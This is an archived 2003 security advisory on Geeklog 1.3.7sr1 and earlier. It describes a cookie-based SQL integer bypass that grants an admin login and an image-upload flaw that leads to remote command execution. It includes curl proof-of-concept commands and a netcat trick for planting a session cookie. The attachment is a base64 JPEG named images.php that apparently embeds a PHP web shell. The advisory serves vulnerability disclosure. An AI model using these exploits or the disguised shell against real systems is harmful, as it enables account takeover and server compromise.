Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: bt307.txt

Geeklog 1.3.7sr1 and below multiple vulnerabilities.





--------------030101000501010009080303
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
Date: 29 May 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:	sk_at_scan-associates.net 
		shaharil_at_scan-associates.net 
		munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.

Description
===========
Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your 
own virtual community area, complete with user administration, story posting, 
messaging, comments, polls, calendar, weblinks, and more! It can run on many 
different operating systems, and uses PHP4 and MySQL.

Details
=======
i) SQL Integer manipulation in authentication script.

from lib-sessions.php line 128 ------------------------------------------------

       if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
           // Session cookie doesn't exist but a perminant cookie does.
           // Start a new session cookie;
           if ($_SESS_VERBOSE) {
               COM_errorLog('perm cookie found from lib-common.php',1);
           }

           $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']]; 
           $cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

           //echo $userid;

           $userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

           if ($cookie_password <> $userpass) {  
               // User could have modified UID in cookie, don't do shit

           } else {
               if ($userid) {
                   $user_logged_in = 1;
                   //echo $userid;
                   // Create new session and write cookie
                   $sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
                   SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_session'], $_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
		   $userdata = SESS_getUserDataFromId($userid);
		   $_USER = $userdata;
               }
           }
       }

------------------------------------------------------------------------

In this case :
DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
"SELECT passwd from $_TABLES['users']  where uid=$userid"

When we supply non-existance user we can by pass the ($cookie_password <> $userpass) 
cause $userpass and $cookie_password will be null.

example:
	curl -b geeklog=9999 http://blablaba/users.php



SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
will  execute SQL query  
"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')"

valid session for user 9999 which is not exist will insert to database;

Integer manipulation to get admin access
----------------------------------------
By supplying floating point number as userid, user can easily login as any geeklog
user. This is because userid is integer value in database and floating point number
always give null value for $userpass (non-existance user) . 2.1 will insert as 2 in 
column with integer data type.

proof of concept:
	curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

header.txt will contain valid session for admin.


ii) Upload image with any extension.

There is lack in error checking for upload image scripts where user can upload valid
with any extention ( users and stories module). User supplied extension will be used 
for images extension. By embed php code in image user can execute any command as apache 
user on remote server.

proof of concept:
	i)  Upload attached file to server using "Internet Explorer". "Internet Explorer"
	    will use file header to generate mime-type for uploaded file.
	ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php


Vendor Response 
=============== 
Vendor has been contacted on 19/05/2003 and fix version is available
http://www.geeklog.net


Tips
====
Simple way to trick mozilla to store session from any site.

i) Edit header.txt.

----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT; 
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22 
GMT; path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


----------------header.txt --------------------------

ii) Using netcat netcat
	# nc -l -p 9090 < header.txt

iii) Set your mozilla http proxy server to 127.0.0.1:9090

iii) Browse to http://blablaba.com/

iv) Unset proxy and browse to http://blablabla.com



--------------030101000501010009080303
Content-Type: image/jpeg;
 name="images.php"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
 filename="images.php"

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
OhAEB//Z
--------------030101000501010009080303--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH